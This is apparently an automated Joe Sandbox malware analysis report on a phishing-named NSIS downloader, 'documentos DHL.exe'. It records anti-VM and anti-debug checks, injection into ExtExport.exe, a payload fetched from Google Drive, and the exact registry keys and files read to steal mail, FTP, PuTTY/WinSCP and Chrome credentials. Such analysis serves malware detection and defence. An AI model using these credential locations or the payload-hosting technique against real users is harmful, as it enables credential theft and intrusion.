Source: C:\Users\user\Desktop\documentos DHL.exe	File opened: C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes\Tset\Demodulationen\Iagttagerposition\Americanly.Unc	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	File opened: C:\Users\user\AppData\Local\Temp\nsd3BF8.tmp	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	File opened: C:\Users\user\Desktop\documentos DHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	File opened: C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes\Tset\Demodulationen\Iagttagerposition\Strukturerne.Pom	Jump to behavior

Source: documentos DHL.exe, 00000002.00000002.1825655120.0000000010059000.00000004.00000800.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000002.1823268088.0000000004849000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: documentos DHL.exe, 00000002.00000002.1825655120.0000000010059000.00000004.00000800.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000002.1823268088.0000000004849000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: ExtExport.exe, 00000025.00000002.1823268088.0000000004849000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: documentos DHL.exe, 00000002.00000002.1825655120.0000000010059000.00000004.00000800.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000002.1823268088.0000000004849000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: documentos DHL.exe, 00000002.00000002.1825655120.0000000010059000.00000004.00000800.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000002.1823268088.0000000004849000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: documentos DHL.exe, 00000002.00000002.1825655120.0000000010059000.00000004.00000800.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000002.1823268088.0000000004849000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: ExtExport.exe, 00000025.00000002.1823268088.0000000004849000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: ExtExport.exe, 00000025.00000002.1822131908.0000000002DE5000.00000004.00000020.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000002.1821244010.0000000002D78000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: documentos DHL.exe, 00000002.00000002.1825655120.0000000010059000.00000004.00000800.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000002.1823268088.0000000004849000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: documentos DHL.exe, 00000002.00000002.1825655120.0000000010059000.00000004.00000800.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000002.1823268088.0000000004849000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: documentos DHL.exe, 00000002.00000002.1825655120.0000000010059000.00000004.00000800.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000002.1823268088.0000000004849000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: ExtExport.exe, 00000025.00000002.1823268088.0000000004849000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\documentos DHL.exe

Code function: 2_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

2_2_10001B18

Source: C:\Users\user\Desktop\documentos DHL.exe

Code function: 2_2_0337133E rdtsc

2_2_0337133E

Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337BF0F mov eax, dword ptr fs:[00000030h]	2_2_0337BF0F
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03376FEF mov eax, dword ptr fs:[00000030h]	2_2_03376FEF
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337BBD5 mov eax, dword ptr fs:[00000030h]	2_2_0337BBD5
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337F2D4 mov eax, dword ptr fs:[00000030h]	2_2_0337F2D4
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0338F516 mov eax, dword ptr fs:[00000030h]	2_2_0338F516
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337BD78 mov ebx, dword ptr fs:[00000030h]	2_2_0337BD78
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337BD78 mov eax, dword ptr fs:[00000030h]	2_2_0337BD78
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337BD8C mov ebx, dword ptr fs:[00000030h]	2_2_0337BD8C
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337BD8C mov eax, dword ptr fs:[00000030h]	2_2_0337BD8C
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03377038 mov eax, dword ptr fs:[00000030h]	2_2_03377038
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03377027 mov eax, dword ptr fs:[00000030h]	2_2_03377027
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03391419 mov eax, dword ptr fs:[00000030h]	2_2_03391419
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337BC70 mov eax, dword ptr fs:[00000030h]	2_2_0337BC70
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337BC4B mov eax, dword ptr fs:[00000030h]	2_2_0337BC4B
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337B4B7 mov eax, dword ptr fs:[00000030h]	2_2_0337B4B7
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033770A6 mov eax, dword ptr fs:[00000030h]	2_2_033770A6
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A08897 mov eax, dword ptr fs:[00000030h]	37_2_02A08897
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A03D68 mov eax, dword ptr fs:[00000030h]	37_2_02A03D68
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A03CB1 mov eax, dword ptr fs:[00000030h]	37_2_02A03CB1
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A03CE9 mov eax, dword ptr fs:[00000030h]	37_2_02A03CE9
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A03CFA mov eax, dword ptr fs:[00000030h]	37_2_02A03CFA
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A08A3A mov ebx, dword ptr fs:[00000030h]	37_2_02A08A3A
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A08A3A mov eax, dword ptr fs:[00000030h]	37_2_02A08A3A
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A08A4E mov ebx, dword ptr fs:[00000030h]	37_2_02A08A4E
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A08A4E mov eax, dword ptr fs:[00000030h]	37_2_02A08A4E
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A0BF96 mov eax, dword ptr fs:[00000030h]	37_2_02A0BF96
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A08BD1 mov eax, dword ptr fs:[00000030h]	37_2_02A08BD1
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A1C1D8 mov eax, dword ptr fs:[00000030h]	37_2_02A1C1D8
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A08932 mov eax, dword ptr fs:[00000030h]	37_2_02A08932
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A0890D mov eax, dword ptr fs:[00000030h]	37_2_02A0890D
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A08179 mov eax, dword ptr fs:[00000030h]	37_2_02A08179

Source: C:\Users\user\Desktop\documentos DHL.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\documentos DHL.exe

Code function: 2_2_0338F535 LdrLoadDll,

2_2_0338F535

Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\documentos DHL.exe

2_2_00403489

Stealing of Sensitive Information

Tries to steal Mail credentials (via file / registry access)

Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	11 Virtualization/Sandbox Evasion	1 Credentials in Registry	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	2 Data from Local System	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	11 Process Injection	NTDS	6 System Information Discovery	Distributed Component Object Model	1 Clipboard Data	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 DLL Side-Loading	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
documentos DHL.exe	18%	ReversingLabs	Win32.Downloader.Minix

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\nsw5DC6.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsw5DC6.tmp\System.dll	1%	Virustotal	Browse
C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes\Tset\Demodulationen\Iagttagerposition\libpixbufloader-icns.dll	0%	ReversingLabs
C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes\Tset\Demodulationen\Iagttagerposition\libpixbufloader-icns.dll	0%	Virustotal	Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external	0%	Avira URL Cloud	safe
https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	142.250.74.206	true	false	high
googlehosted.l.googleusercontent.com	142.250.186.65	true	false	high
doc-04-90-docs.googleusercontent.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://doc-04-90-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/cus72g9uti9p4sqam1k45t4h3de3hhkd/1669658550000/01268323115933183181/*/1lmBjkmJX2WixZUvaKmoyB8cex-DCePE2?e=download&uuid=e0f4c7f4-041c-4571-801a-cda7ca0f1ae2	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://doc-04-90-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/cus72g9u	ExtExport.exe, 00000025.00000002.1822822611.0000000002E46000.00000004.00000020.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000003.1809581126.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000003.1802976587.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000002.1821975252.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000003.1803583412.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	documentos DHL.exe	false		high
https://doc-04-90-docs.googleusercontent.com/	ExtExport.exe, 00000025.00000003.1809581126.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000002.1822393701.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://doc-04-90-docs.googleusercontent.com/:	ExtExport.exe, 00000025.00000003.1809581126.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/	ExtExport.exe, 00000025.00000002.1821244010.0000000002D78000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/d	ExtExport.exe, 00000025.00000002.1821244010.0000000002D78000.00000004.00000020.00020000.00000000.sdmp	false		high
https://doc-04-90-docs.googleusercontent.com/=	ExtExport.exe, 00000025.00000003.1809581126.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000002.1822393701.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external	ExtExport.exe, 00000025.00000003.1802976587.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp, ExtExport.exe, 00000025.00000003.1803583412.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.74.206	drive.google.com	United States		15169	GOOGLEUS	false
142.250.186.65	googlehosted.l.googleusercontent.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	755464
Start date and time:	2022-11-28 19:00:32 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	documentos DHL.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.troj.spyw.evad.winEXE@45/6@2/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 21.5% (good quality ratio 21.1%) Quality average: 88.5% Quality standard deviation: 21.7%
HCA Information:	Successful, ratio: 97% Number of executed functions: 78 Number of non-executed functions: 193
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
Excluded domains from analysis (whitelisted): spclient.wg.spotify.com, wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, wdcp.microsoft.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	justificante de transferencia.vbe	Get hash	malicious	Browse	142.250.74.206 142.250.186.65
	m47Lhz6xqW.exe	Get hash	malicious	Browse	142.250.74.206 142.250.186.65
	ZbYq1RnBWJ.exe	Get hash	malicious	Browse	142.250.74.206 142.250.186.65
	http://saylor2xbtc.com	Get hash	malicious	Browse	142.250.74.206 142.250.186.65
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fmy.forms.app%2fform%2f6384c22bb200f15a82cb303a&c=E,1,61YlnyBv4gh0xmLTg-xCizgU2SpUvrWPS5wWKt9oSw25xQU-5u4shaUq9wMz3i8ZpwYO-4BbnDAm0s-1HaysXG-igEdpxT0mwD1dEildTTilp0w,&typo=1	Get hash	malicious	Browse	142.250.74.206 142.250.186.65
	https://storageapi.fleek.co/230cd701-cb1b-49c1-907c-9b7012f1b99b-bucket/qen.html#	Get hash	malicious	Browse	142.250.74.206 142.250.186.65
	https://www.degussa-bank.de/c/blogs/find_entry?p_1_id=0&noSuchEntryRedirect=https://www.sba.gov///www.iedcolombiaaprende.edu.co/doc/	Get hash	malicious	Browse	142.250.74.206 142.250.186.65
	https://mailsrver.contributes.rest/databases.html?home=mafisher@archphila.org	Get hash	malicious	Browse	142.250.74.206 142.250.186.65
	test1.dll	Get hash	malicious	Browse	142.250.74.206 142.250.186.65
	vbc.exe	Get hash	malicious	Browse	142.250.74.206 142.250.186.65
	Swift Mesaj#U0131#09971.exe	Get hash	malicious	Browse	142.250.74.206 142.250.186.65
	094089010-094098574-1669343495-1669343493-2332.html	Get hash	malicious	Browse	142.250.74.206 142.250.186.65
	Facture.html	Get hash	malicious	Browse	142.250.74.206 142.250.186.65
	SyyMuhzBJ3.exe	Get hash	malicious	Browse	142.250.74.206 142.250.186.65
	file.exe	Get hash	malicious	Browse	142.250.74.206 142.250.186.65
	045624132441524.exe	Get hash	malicious	Browse	142.250.74.206 142.250.186.65
	file.exe	Get hash	malicious	Browse	142.250.74.206 142.250.186.65
	Lakeringernes (1).exe	Get hash	malicious	Browse	142.250.74.206 142.250.186.65
	FedEx Express AWB#53053232097Receipt.exe	Get hash	malicious	Browse	142.250.74.206 142.250.186.65
	Rfq#Specification.exe	Get hash	malicious	Browse	142.250.74.206 142.250.186.65

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\nsw5DC6.tmp\System.dll	documentos DHL.exe	Get hash	malicious	Browse
	PO No. 3200005919.exe	Get hash	malicious	Browse
	PO No. 3200005919.exe	Get hash	malicious	Browse
	Swift Mesaj#U0131#09971.exe	Get hash	malicious	Browse
	Swift Mesaj#U0131#09971.exe	Get hash	malicious	Browse
	Swift Mesaj#U0131#09971.exe	Get hash	malicious	Browse
	E-DEKONT.exe	Get hash	malicious	Browse
	E-DEKONT.exe	Get hash	malicious	Browse
	VAN66789.exe	Get hash	malicious	Browse
	VAN66789.exe	Get hash	malicious	Browse
	PROFORMA-418340-2022.exe	Get hash	malicious	Browse
	PROFORMA-418340-2022.exe	Get hash	malicious	Browse
	SecuriteInfo.com.NSIS.InjectorX-gen.6534.4411.exe	Get hash	malicious	Browse
	SecuriteInfo.com.NSIS.InjectorX-gen.6534.4411.exe	Get hash	malicious	Browse
	Fedex No71502.exe	Get hash	malicious	Browse
	Fedex No71502.exe	Get hash	malicious	Browse
	datos bancarios pdf.exe	Get hash	malicious	Browse
	datos bancarios pdf.exe	Get hash	malicious	Browse
	MV VALADON.exe	Get hash	malicious	Browse
	MV VALADON.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsw5DC6.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\documentos DHL.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.659384359264642
Encrypted:	false
SSDEEP:	192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
MD5:	8B3830B9DBF87F84DDD3B26645FED3A0
SHA1:	223BEF1F19E644A610A0877D01EADC9E28299509
SHA-256:	F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
SHA-512:	D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Joe Sandbox View:	Filename: documentos DHL.exe, Detection: malicious, Browse Filename: PO No. 3200005919.exe, Detection: malicious, Browse Filename: PO No. 3200005919.exe, Detection: malicious, Browse Filename: Swift Mesaj#U0131#09971.exe, Detection: malicious, Browse Filename: Swift Mesaj#U0131#09971.exe, Detection: malicious, Browse Filename: Swift Mesaj#U0131#09971.exe, Detection: malicious, Browse Filename: E-DEKONT.exe, Detection: malicious, Browse Filename: E-DEKONT.exe, Detection: malicious, Browse Filename: VAN66789.exe, Detection: malicious, Browse Filename: VAN66789.exe, Detection: malicious, Browse Filename: PROFORMA-418340-2022.exe, Detection: malicious, Browse Filename: PROFORMA-418340-2022.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.NSIS.InjectorX-gen.6534.4411.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.NSIS.InjectorX-gen.6534.4411.exe, Detection: malicious, Browse Filename: Fedex No71502.exe, Detection: malicious, Browse Filename: Fedex No71502.exe, Detection: malicious, Browse Filename: datos bancarios pdf.exe, Detection: malicious, Browse Filename: datos bancarios pdf.exe, Detection: malicious, Browse Filename: MV VALADON.exe, Detection: malicious, Browse Filename: MV VALADON.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....uY...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3425316567-2969588382-3778222414-1001\1b1d0082738e9f9011266f86ab9723d2_11389406-0377-47ed-98c7-d564e683c6eb

Download File

Process:	C:\Program Files (x86)\Internet Explorer\ExtExport.exe
File Type:	data
Category:	dropped
Size (bytes):	47
Entropy (8bit):	1.1262763721961973
Encrypted:	false
SSDEEP:	3:/lSllIEXln:AWE1
MD5:	D69FB7CE74DAC48982B69816C3772E4E
SHA1:	B1C04CDB2567DC2B50D903B0E1D0D3211191E065
SHA-256:	8CC6CA5CA4D0FA03842A60D90A6141F0B8D64969E830FC899DBA60ACB4905396
SHA-512:	7E4EC58DA8335E43A4542E0F6E05FA2D15393E83634BE973AA3E758A870577BA0BA136F6E831907C4B30D587B8E6EEAFA2A4B8142F49714101BA50ECC294DDB0
Malicious:	false
Preview:	........................................user.

C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes\Tset\Demodulationen\Iagttagerposition\Americanly.Unc

Download File

Process:	C:\Users\user\Desktop\documentos DHL.exe
File Type:	ASCII text, with very long lines (41286), with no line terminators
Category:	dropped
Size (bytes):	41286
Entropy (8bit):	3.9996729388074086
Encrypted:	false
SSDEEP:	768:7QFBt4/f3V9yKs85GMDkPo5jwtKrqfKOrd/t1GfhfzAa08RtCdIc:7QGf3V1siGM/5jEKrqyOrdl+hrZRQr
MD5:	9B8C8C90EE802C398079F4AF57961D8B
SHA1:	644AA417B2BC3B61BC2966CB4F732304B6229655
SHA-256:	A0B1E5CAC30130A40C239EB24DC2EEFE148B78310D1A550A580E1EBE0FCEEE74
SHA-512:	7640ACDF2F4B38E18FC7F633BEA98FFAA7CC5137CCDBEB108529F2C92027A3241CEF942FA511A5E028E056FF2F97779886C7F8CBD69CE31D6C31D951CDB60EF2
Malicious:	false
Preview:	C089DEEE2F80F894D8CBCAC903AB13EAC24FB93D53429CC2C6616687919B015FAA04E2F0BE0D98B80F07DEB3ED384DC5CC6C3BA629AE650595DF0601DB2EE4DD9AE8CFDE80A1D7654162110360D3AB982B82270DCEE3FC808955B6F679823F99DBAA0C0F3E32822D500A45EDB7520148BE33E06F34B63DD8C015A6DEA3AE12F22E096BED860F1BC954127D6474140237C63259E2F631647C50BD25671C3415E72ACBCA78ECA905C3E9A1E49775CE31B542CBF59FCFB34011A5732FCD5D4DA7FBD63CD845581795F251CC1698A2154BFE0ECDAE654CD0AC07496EB565AB5BD8B792B032F2AB7BBB48D24C4D517442BED56E04D7816FFE1E05673F622F9D66330D5FF86FABFF9CFE0A90B2F4EC6DB66AEACCE6E3D82E93296888BC80F6892F9215F1BBB49894B3ABFC46481822C132E84B9A2DCC8C6700C7225BE56C81339D37252D584772F5774F94F90C6AA3FD0C64845D9641B4DFF60D7F957BCC90EB6CE94A6AD6511BBDA4CD7670DE769CFD8BBEAA9ACC7BF1C77123A9EE35E323281877BE2BDB8D230B235C5C80C3C753E91D61731B47905A8EF9A1295B6000FCC3F8E930BAE3A761C2C2D0EC9C5AB9047A6DE6343F5CD2058FD508B1E654DA845F2F48E4DD0B1189979BE314B1D99FDA992D8101AEFBEBB862ECC07F10E1DA299D23C68953FA5D227ADF643F111211C4AC24CEA9C3961A78

C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes\Tset\Demodulationen\Iagttagerposition\Strukturerne.Pom

Download File

Process:	C:\Users\user\Desktop\documentos DHL.exe
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	158847
Entropy (8bit):	6.98796457235067
Encrypted:	false
SSDEEP:	3072:tGYqJRr8sNY/ryIAYmvZ535mkL9bebIbws3CMppUy3V:FqJRr8UY/Bgvr35mkJ0Y9l
MD5:	7C98821952212D7D1554D45AF77DED1E
SHA1:	41DBCCEFDC520F60122AF9A6FEBDF452AC65DE10
SHA-256:	387C91D05A65764ED93EB897E5D68465E251811A5D09EAB2EA23BB7F26740A8E
SHA-512:	0E8B46122DEE44C2BE98A747A4F508FD8E2E41631D68C361D95AB701ECDB2C2D18923E7047DA6A74E93B0B43C6F553FD61FC1AF452D2404C259346D68431D12E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

